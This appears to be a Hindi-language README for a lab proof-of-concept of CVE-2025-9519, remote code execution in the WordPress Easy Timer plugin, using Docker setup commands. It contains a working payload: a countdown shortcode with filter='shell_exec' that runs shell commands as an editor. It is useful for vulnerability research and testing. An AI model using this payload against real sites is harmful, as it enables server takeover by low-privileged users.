
CVE-2025-9519 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो WordPress Easy Timer प्लगइन में क्राफ्टेड शॉर्टकोड फ़िल्टर के माध्यम से रिमोट कोड एक्ज़ीक्यूशन प्रदर्शित करता है, जिसमें Docker-आधारित सेटअप शामिल है।
आधिकारिक Docker दस्तावेज़ देखें: Docker Engine Install
अपनी प्रोजेक्ट निर्देशिका से:
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins
wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip
sudo docker compose restart wordpress
http://localhost:8000/ पर जाएँWordPress डैशबोर्ड → प्लगइन्स → पर जाएँ और पर क्लिक करें।
Easy Timerसक्रिय करें
अपनी प्रोजेक्ट निर्देशिका से निम्नलिखित कमांड निष्पादित करें:
docker compose run --rm wpcli user create \
editoruser [email protected] \
--role=editor \
--user_pass=P@ssw0rd!
(नोट: अपनी पसंद के उपयोगकर्ता नाम, ईमेल और पासवर्ड से बदलें!)
पोस्ट → नया जोड़ें पर जाएँशॉर्टकोड ब्लॉक डालें और निम्नलिखित दर्ज करें:[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
⚠️ नोट: शॉर्टकोड को ठीक से प्रस्तुत करने के लिए सुनिश्चित करें कि आप शॉर्टकोड ब्लॉक का उपयोग कर रहे हैं, न कि पैराग्राफ ब्लॉक का।

बधाई हो, आपको RCE मिल गया।

sudo docker ps
आपको कुछ इस तरह दिखना चाहिए:

यदि शॉर्टकोड प्रस्तुत नहीं हो रहे हैं:
यदि http://localhost:8000/ पर नेविगेट करने पर डेटाबेस कनेक्ट नहीं है दिखाई देता है: